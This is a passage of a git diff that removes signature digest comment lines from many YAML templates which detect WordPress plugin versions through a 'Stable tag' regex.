4a0a004730450220059ae7c69b49810167d19fad14adaeb2de024a850763b6c0b7bfb0b6ff4839d5022100d479cae8f921513ff2acff81a51c72f6a77f184f91830fe875ec5f00324b164f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 27f857f4e7..42be14c5df 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ce1515fad311fbd37d073ed7ac1e7bd25753204de659fbc213abb0d41e18f1ea022100eba17c30a6a8fa1882936ba389fad464a7ec4eb4d47d0dc03adbd609175b66dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index e24e2573de..4e0cd86c3f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009a662fd0e8b542046eb2f4bc33561eb4cad45140690d1a2fbdb4e58246a77ba902200603bef835dcf94448fb6bc30025877d4deabbdd73ac4b663b7c9228c749fb08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index da214d605d..59eadc5e6e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d9a809e17e4d71482265577bebc1ba659f85baa4c428e7a3511929e7608cc0bf0220205fe4464d064b258adb9a89a250c4a2360c294ab93bf07ca57c58510650d40a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 9fd9cd5656..41f7a0075e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ae16457fb8a8b1da0e9efb67e7ad2be08454661e36c9f94fb2e12bb4b9d5b60b022006cca9463ab38c4cc06a75ec0f792f23d3e50ee6322aca43590057c9399f9b80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index fd72a1e0de..7e35a3fb4f 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022035d6fdb62d06c9b7993f6742a3595a61a27b154d76f612b22c0a35fab2a28bf202210094075f04e32a3b3458c01141aaa6e3a7b298f1e198e70878378c58f90d03ac8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index fa07947ba6..18c2a7586e 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201f40d80db701c9dbd8cd8f0e99e556493432573828db8ec835b3cac5011b31bb02204f749f9de83a1dd693a1a9daa28bddbf5e6d37a02dc2fd73e66ccaf5a539ac04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 9995ad8aaa..6bc2aa78f9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207147d2f3fca453afc3743a0d9261d2b0426559027f850701d22c0ea1f1236522022078674543cb5d0f1cd0df67f9acf09847db3feb2277ab75245c1ddc1169f0dcc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 03733b8db1..a43d3352a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220185f705766bc1e8ba3bdc76863046c6bfe6251ec36efc83a86497b7ba5cfc99a022100b6ec129d9b3960e3b08c4333a93727fb69e5cbfafaf8ceb7734c3131402e203d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 5db7d5ebb5..e7db9944e4 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100af6a6ee01aa5e0716fa888e19a140bf8717c84f277a1f2a4f7bffe0868f0fff2022100e6866e153a66f6d9efbed679eacb35d7279a05c4b15c0d96536865814820afb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index a64ae86367..268bd7b9df 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a4ad67de36ba452c0723c920dac767f1fd9483c03293e7f97e9569e78e2e3233022100b913eff8c1a358f6a21b0e87681ba0896de20eada88c83674c6e86d80cf182cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 2b2e5b3910..d7fb2209d1 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d5a86a83715474a762815156e6a84ea2056bf06cfdc63e35155d8b429ba168ee022036a783a209cf8f41a130a8f6c97ac941ed21d3c2f83336451eb744c82c6d43b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 5048b1cfcc..a1641d4632 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c37d28c2c455c1f595cd1ee90a822318ca56e9659763001690d3cd0b1f030ab702200f0d47000be44932dc8575366e6e4d75b22e70d2cdd58419e03946d34ade6375:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3dd14a1ee0..3b6542683c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202d9a2432d460f6674dc0f37b3fea4ad9c288b3a1390bb70e6b186737f6a0c7920220618a39b7c5e05509347c11b86f4e1355ae8f13ab80aacca269ab467fdef0469e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index cc2f86493f..969c280ee1 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210092bc434d32c638674e6d3c5a5a55b218f72a053fa6926d3a4f4eb65fd75fcfa8022100d3c4357245cf68d3fd251d220b113fdb8fb37960e485b7f39d4c9ccb36f742fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 828ffae16c..1c97c422e4 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200d9927b4fa6320bcb40a6979256d3e4e99c61bdc6f7933828a1fcd376ae6d6f802203bc6709cb31dd6f3d239daaff92e4442c5fef666b20c88dfdf29388b3129389c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 5e098ba3f4..7d861cf06a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b09f5af46aa953e27cadc7030a47ae00f081d7d3bf1e533565e1c40f8c513c92022100f858959d1a4466cb8cdab609a982b9016bfa164209f533515f282d3110278629:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 94649baf34..00eb1e2dfc 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008269bf4fe901412b3b42c47d9b2155ae368e179fb0dd5a78fc45ebade64e2faa022100a5228df1524301e32f3b0ff7a0f4de83c2051ec53ae36831c0d4321a3a31cda1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index 1406ff1a7d..f089ee37d3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022020511f6c1de1e846716a3317ff795f9b78a446ace6dfb651f93129788a25eff00221008e16ce945d3924b07796d77152e077475bb6a64dc1211add62ac86553561947c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index cfd8de4f96..492d66db68 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b15e4c435a428c54f5709857212718c9e2db6e627b532d09e62a57fa399df03702203293e17f57f6a3157cc7806f4e4947d6a5715709a6d935a1ac840f47b446d72b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index dfe8b6c942..f8903fa3db 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207c39e8e59f9f69df5df80b158b9662914c34a93addfabf17cbe3525355916bad022100ae55e927eccf65e066f19237536757cf6b072512e9f825d5dc07801bc94635c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 139990b70e..ae2451ca38 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f2de9cd6e5a8f71d6174bcba1e1f68577833c86c232cdd65c12f97c5e4ed4165022066f89d9e723dfe1cee020417745a34b67664b51e319baf7bd941b7ea941f8695:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 3b9bb17588..dcc61d1255 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220340705f11205ba2e53c1e4e2aa46f1143290ec6cdd0a7f442161a7d0e7e9e9c6022030b4a5cebdeefcc68ae0628c22ef6795a3ce0b9ad660b0f5a098d15656673bf5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 01386642d0..d1d2c1c1d0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022026cc40e3e73c0c6b65cdfa11366abf4f8a49e7e17a3b143e432da4de562b6e95022039d690eac5b484937c112d6ed58f4640504057322201df981a47a1160f9398e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 929a7c2449..5f5e8afed5 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203b6d55a84e5c378e5acb0c69d458dd6452eda7d86f2825f5674528f10be59e19022014b5cb6919be0f10c26b15ff703565aebea9aea3cb1c5608eea924c2feb2f712:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index afe23c5097..d15634bb2b 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ff6d14c10851c1070a455bd39670fea4430b7384c60395d970261e4ff9babe19022022701db514828fe5eed8c98771ff80cf72989fc450cddec1431c124f7345a82e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index f0169e4730..7da04be5d3 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207a5bf067f51f1024a5bcd89dc41a1c0a09b4347fe52ed566d16f303bd75db1a20221009c0a8ab5adbafeb3c689f2f0c4d4188cbed9b478e3ff5dacbe63d93f46d7900b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 0e067d29b5..a79253cec5 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022071d9bd3f5c57ba5908946f28f786d090e5a85d5b7e76d6b69e7f301cca3d1121022026b5df0af5b366c45408dcb67664e063843743707ff1d69517be135fc1993e0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 7d5d50b14c..77fc04a220 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207c6e3274e90cf19bb841a9689a36d3c1f6d379b02b2a771f2e1f6e7e89a708ce022100e1547187f3f0e9f14b94dea2f77b12c30164c81c6dc4498ce85d4f78e658a522:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 51397c95b1..733f9ee453 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200cd989fc7c8e20b6a83760d9aae1713e149bb96a62fce18667c1ec3b73e775ba02207966d041f1b16bd2fd7c0e33bd38732332448531c2d688b8b54646da902afc16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index deb314954c..0af08f0ac0 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022000902a9a920a6eab11197982d102c4ba65970efcdf6d556c8ed09263be346e77022100fac915074abc270ef311abc6e762693543849af191a56143de289f2f91e69c66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 7601b04479..1e4c77fbca 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dd508b2751eddcabcdff20d6bb8a1828e45bec5d040328d4fe5154a3492b24b20221008ceb6de1609d4c0997c9677fe71d33b840239f68501e396543c1b8e885c28144:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 7eb6880cde..295e3fe82d 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008c60ee08212aca9d843600372e87a9f4a9d7d11300e92ad8894560b67a71be9302206aa943664c8700391073905ca8e15bc974ad6164da8952023e05f06c2e951a1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 9c4c4b3543..862f73201f 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205b4be7a7704d46205c25d37e8f14456f7f904433dde41610dc073ffc3a8275e6022100ac458e73aa8a7b93482cec595b910e77b9edaac3470eb87bf4ee831e45273c14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index adbc5f2a01..711b64f9d0 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ae896b1301d3674d9500be4ef671983e5199ea50b9603f15f2b59783ee460cd5022050b360d91fabf00e4b23417d6f52f2c482bb6a2a550f900992505854b334a6cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 32706a10b2..58ddcfab78 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022054134b051359bad45851f2139f85868a6f570592ca3587cd795714f7055b2c3a022045d9ff12232a51d5d6527de05435bbd951629b8f00745997a9a7457c4df0bb05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 297f8a6ee1..305d74e8ea 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022031a0a11424d302218964ba75428dc340c0c783ea7b28286f908f4e9af678184b022100caef77a9b4402fd1e349c5439f590d82bfcfddc0e6c2ab7f735f602294b4f956:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 5f4f8fed97..668162fc4e 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022023b3c7115df7f7b4a7bf2a4d1cdac7a90415ba094dc570edb3ec7b1e52ed835c0220127e9267597c7153e7031fe0b0861f826e4a46444165c63c8cb38b14d9d9175e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index cba0a643bb..2a233f389d 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009be555f4c3f7a15b9f921ebd25f43ef309929448564485ee3ffafacdb686916f02207867fd0d2564e965a874733f302ddca646c36248350db90b8d2e59c63ffd6d8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 85548e3202..a0d2554492 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100afab902835ebe06a4c3f6bda89add6b22f8b59d5949532a80c70e140ba1f92d102202083931d1e4fdcf829296d52d368cab1d562ee393bda30fa6dc668b8e6d71f77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 63e6970836..4e5046273d 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206a68024a4ac10a0a5a25a540e068c28e591833828663eb34a479d40b5dec60a6022100831b40a660b761a6a540e4fe8ba874904d4622a03658ef15eeb7ef9014dc3934:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index ef5ef0098a..f44cee7980 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206b14504e91d2bfa06c79a61fb5d65b4ba9846c046465c5b3f5823a6e960ccb0a02210082e096ad503a4df33a6db77bdeeef642a7ee922c24c4ad66c31814b3c6805f01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 8a4b6ab32d..39130db767 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201b57bdd5ea956da81d9eb5806e6206f7d7c718f8c1feae28fdfae3c9548b0f130220207774a8ca6f320dc5a32b6632a7cc91acf97a0de8df6d846f794399fe1983d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index e40b544335..39c497073c 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b95983a70fa5717462902aff3f5e513a428e928530c97bc5428e9eead7c5b73c0220294caa2d40254a635049ef1cf946e7642a5b548b158244f5897dbc2b956ec261:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index c838104005..b848288b55 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220237171643e0237a8118d83598b1b66d4cf2858948dc3e4dfb7a7b27e78e8f3fa022013aae9d90ed3a55ce1f8b02ea28fdbdc57541d4f5aad26a4df551fdda507054b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 55b1a5ed7f..4d10178692 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008926c686e954a7e38cc729821283c7cac69cb723d3c1ee5fa0b90faa870d7c3c022056e3ede1c4986e685b6bd70cd2f9bc7f69e4d31c99c41e8cb2bd9ece3a0b0a26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 0d8ee8452c..7aac0a153f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210082c01583a98c1d17974cc2577ddc209c37191a047d911033746a745377898943022100f6cbc7e3116782ec93d07c8c974f1d959c1ade124040426793769cd040fb20c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 2a5c73a7b2..d0cebd5316 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220492f1157d41a51af303ece9140557f61e11c57791eb81587c3fbd5eaaa02056602203a9c3832f874e1f0e5836c17ca9c0e8fe0fe351454a5abb79956f54539003cf9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 776f31b48c..ff20779157 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ 